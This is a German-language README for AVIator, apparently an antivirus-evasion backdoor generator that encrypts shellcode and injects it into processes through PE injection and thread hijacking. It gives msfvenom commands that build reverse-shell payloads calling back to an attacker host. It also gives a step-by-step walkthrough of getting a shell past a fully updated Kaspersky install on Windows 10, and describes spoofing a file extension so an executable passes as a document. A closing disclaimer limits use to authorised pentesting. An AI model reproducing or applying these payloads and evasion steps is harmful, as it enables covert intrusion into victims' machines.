
Antivirus evasion project
AviAtor auf NETCore 5 portiert mit aktualisierter Benutzeroberfläche
Über://name
AV: AntiVirus
Ator: Ist ein Schwertkämpfer, Alchemist, Wissenschaftler, Magier, Gelehrter und Ingenieur, mit der Fähigkeit, manchmal Gegenstände aus dem Nichts zu erschaffen (https://en.wikipedia.org/wiki/Ator)
Über://Zweck
AV|Ator ist ein Backdoor-Generator-Tool, das kryptografische und Injektionstechniken verwendet, um die AV-Erkennung zu umgehen. Genauer gesagt:
[https://attack.mitre.org/techniques/T1055/]:
Injektion von ausführbaren Portables, bei der schädlicher Code direkt in den Prozess geschrieben wird (ohne eine Datei auf der Festplatte) und dann die Ausführung entweder mit zusätzlichem Code oder durch Erstellen eines Remote-Threads ausgelöst wird. Die Verschiebung des injizierten Codes führt zu der zusätzlichen Anforderung, Speicherverweise neu zuzuordnen. Variationen dieser Methode, wie reflective DLL-Injection (Schreiben einer selbstabbildenden DLL in einen Prozess) und Memory-Modul (Abbilden einer DLL beim Schreiben in den Prozess), umgehen das Problem der Adressverschiebung.
Thread Execution Hijacking, bei dem schädlicher Code oder der Pfad zu einer DLL in einen Thread eines Prozesses injiziert wird. Ähnlich wie bei Process Hollowing muss der Thread zuerst angehalten werden.
Die Anwendung hat ein Formular, das aus drei Haupteingaben besteht (siehe Screenshot unten):

Wichtiger Hinweis: Der Shellcode sollte als C#-Byte-Array angegeben werden.
Die Standardwerte enthalten einen Shellcode, der notepad.exe (32-Bit) ausführt. Diese Demo dient als Hinweis darauf, wie der Code formatiert sein sollte (mit msfvenom kann dies einfach mit dem Schalter -f csharp erreicht werden, z.B. msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
Nach dem Ausfüllen der bereitgestellten Eingaben und der Auswahl des Ausgabepfads wird eine ausführbare Datei gemäß den gewählten Optionen generiert.
Einfach ausgedrückt: Eine ausführbare Datei so manipulieren, dass sie eine „harmlose“ Erweiterung wie ‚pdf‘, ‚txt‘ usw. zu haben scheint. Z.B. wird die Datei „testcod.exe“ als „tesexe.doc“ interpretiert.
Seien Sie sich bewusst, dass einige Antivirenprogramme die Manipulation allein als Malware alarmieren.
Ich denke, jeder weiß, was das ist :)
Erhalten einer Shell auf einem Windows 10-Rechner mit vollständig aktualisierter Kaspersky AV
Erstellen der Nutzlast mit msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Verwenden Sie AVIator mit den folgenden Einstellungen
Ziel-OS-Architektur: x64
Injektionstechnik: Thread Hijacking (Shellcode-Architektur: x64, OS-Architektur: x64)
Zielprozess: explorer (Standardeinstellung belassen)
Stellen Sie den Listener auf dem Angreifer-Rechner ein
Führen Sie die generierte exe auf dem Opfer-Rechner aus
Windows:
Entweder das Projekt kompilieren oder die bereits kompilierte ausführbare Datei aus dem folgenden Ordner herunterladen:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
Mono entsprechend Ihrer Linux-Distribution installieren, die Binärdateien herunterladen und ausführen
z.B. in Kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
An Damon Mohammadbagher für das Verschlüsselungsverfahren
Ich habe diese App entwickelt, um die anspruchsvollen Herausforderungen des Pentest-Prozesses zu bewältigen, und dies ist der EINZIGE WEG, wie diese App verwendet werden sollte. Stellen Sie sicher, dass Sie die erforderliche Berechtigung haben, sie gegen ein System einzusetzen, und verwenden Sie sie niemals für illegale Zwecke.